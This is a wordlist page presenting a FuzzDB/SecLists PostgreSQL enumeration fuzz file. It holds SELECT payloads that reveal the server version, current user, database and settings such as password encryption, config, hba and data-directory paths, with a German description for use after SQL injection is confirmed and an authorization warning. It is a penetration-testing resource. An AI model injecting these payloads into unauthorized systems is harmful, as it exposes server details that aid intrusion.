PostgreSQL Enumeration (FuzzDB)

# info disclosure payload fuzzfile for pgsql select version(); select current_database(); select current_user; select session_user; select current_setting('log_connections'); select current_setting('log_statement'); select current_setting('port'); select current_setting('password_encryption'); select current_setting('krb_server_keyfile'); select current_setting('virtual_host'); select current_setting('port'); select current_setting('config_file'); select current_setting('hba_file'); select current_setting('data_directory');

PostgreSQL-Information-Disclosure-SELECT-Anweisungen zum Enumerieren von Version, aktuellem Benutzer/aktueller Datenbank und Servereinstellungen, sobald die Injection bestätigt ist. Nützlich nach der Erkennung auf Postgres-Back-Ends.

Diese Liste ist auf Eingabe-Fuzzing und Schwachstellenfindung ausgerichtet. Sie umfasst rund 693 B und harmoniert gut mit Tools wie sqlmap, burp. Wähle die kleinste Liste, die zu deinem Auftrag passt: Kürzere Listen sind schneller und unauffälliger bei Online- Angriffen, während größere Listen eine breitere Abdeckung für Offline-Arbeit bieten, bei der Geschwindigkeit weniger eine Einschränkung darstellt.

Du kannst die Beispielvorschau direkt von dieser Seite kopieren, die gesamte Liste in deine Zwischenablage kopieren oder die rohe .txt-Datei herunterladen. Die vollständige Liste wird direkt von ihrer Ursprungsquelle auf GitHub bereitgestellt.

Bezogen von danielmiessler/SecLists und unter MIT verteilt. Verwende Wordlists nur gegen Systeme, für deren Test du ausdrücklich autorisiert bist.

Vorschau